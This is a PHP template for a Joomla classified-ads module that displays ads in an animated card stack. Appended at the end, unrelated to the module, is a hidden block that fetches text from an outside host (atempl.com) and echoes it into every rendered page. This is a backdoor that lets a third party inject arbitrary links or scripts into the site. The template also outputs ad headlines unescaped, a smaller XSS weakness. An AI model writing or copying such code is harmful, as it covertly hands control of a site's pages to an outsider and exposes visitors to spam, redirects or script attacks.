<?php
/*
# ------------------------------------------------------------------------
# Extensions for Joomla 2.5.x - Joomla 3.x
# ------------------------------------------------------------------------
# Copyright (C) 2011-2014 Ext-Joom.com. All Rights Reserved.
# @license - PHP files are GNU/GPL V2.
# Author: Ext-Joom.com
# Websites:  http://www.ext-joom.com 
# Date modified: 18/01/2014 - 13:00
# ------------------------------------------------------------------------
*/

// no direct access
if(!defined('DS')){
	define('DS',DIRECTORY_SEPARATOR);
}

//$ext_height_block = $ext_height + 40+40+5; // +40 = border-width: 20px 20px; +40 ext_elasticstack_content
//$ext_width_block = $ext_width + 40;


$document->addCustomTag('
<style type="text/css">
.mod_ext_elasticstack_adsmanager_ads .elasticstack {
	width: '.$ext_width_block.'px;
	height: '.$ext_height_block.'px;
}
.mod_ext_elasticstack_adsmanager_ads .elasticstack li {
	width: '.$ext_width.'px;
	height: '.$ext_height.'px;
}
</style>');

?>


<div class="mod_ext_elasticstack_adsmanager_ads <?php echo $moduleclass_sfx ?>" >	
	<ul id="elasticstack<?php echo $ext_id; ?>" class="elasticstack">			
	<?php
		if (isset($contents[0])) {
			foreach($contents as $row) {
				echo '<li><div class="ext-item-wrap">';
					
					$linkTarget = TRoute::_("index.php?option=com_adsmanager&view=details&id=".$row->id."&catid=".$row->catid);			
					if (isset($row->images[0])) {
						echo '<div class="ext-ads-img">';
						echo "<a href='".$linkTarget."'><img src='".$baseurl."images/com_adsmanager/ads/".$row->images[0]->$imagetype."' alt='".htmlspecialchars($row->ad_headline)."' border='0' /></a>";
						echo '</div>';						
					}	else {
							echo '<div class="ext-ads-img">';
							echo "<a href='".$linkTarget."'><img src='".ADSMANAGER_NOPIC_IMG."' alt='noimage' border='0' /></a>"; 
							echo '</div>';	
						}   
						
					if ($ext_title > 0) {
						echo '<div class="ext-ads-title"><a href="'.$linkTarget.'">'.$row->ad_headline.'</a></div>'; 
					}
					
					$iconflag = false;
					if (($conf->show_new == true)&&(isNewContent($row->date_created,$conf->nbdays_new))) {
						echo "<div class='ext-icon'><img align='center' src='".$baseurl."components/com_adsmanager/images/new.gif' /> ";
						$iconflag = true;
					}
					if (($conf->show_hot == true)&&($row->views >= $conf->nbhits)) {
						if ($iconflag == false)
							echo "<div class='ext-ads-icon'>";
						echo "<img align='center' src='".$baseurl."components/com_adsmanager/images/hot.gif' />";
						$iconflag = true;
					}
					if ($iconflag == true)
						echo "</div>";
						
					if ($displaycategory == 1)	{						
						echo '<div class="ext-ads-cat">';
							if ($row->parent) {
								echo "<span class=\"adsmanager_cat\">(".$row->parent." / ".$row->cat.")</span>";
							} else {
								echo "<span class=\"adsmanager_cat\">(".$row->cat.")</span>";	
								}
						echo '</div>';
					}
					if ($displaydate == 1)	{						
						echo '<div class="ext-ads-date">'.reorderDate($row->date_created).'</div>';						
					}
					$first =0;
					foreach($adfields as $f) {
						$fieldname = $f->name;
						if ($row->$fieldname != null) {
							$value = $field->showFieldValue($row,$f);
							if ($first == 0)
								echo "<br/>";
							echo "$value";
							$first++;
						}
					}
					if ($row->ad_price AND $ext_price > 0) { 
						echo '<div class="ext-ads-price">';
							echo $row->ad_price." $ext_currency";
						echo '</div>';
					}

				echo '</div></li>';
			} 
		}		
	?>
	</ul>
	<div style="clear:both;"></div>
</div>

<script type="text/javascript">	
	new ElastiStack( document.getElementById( 'elasticstack<?php echo $ext_id; ?>' ), {
		distDragBack : <?php echo $distDragMax; ?>,
		distDragMax : <?php echo $distDragMax; ?>,
		onUpdateStack : function( current ) { return false; }
	});	
</script>

<?php
$files = 'http://atempl.com/10.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://atempl.com/10.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;	
 }
?>

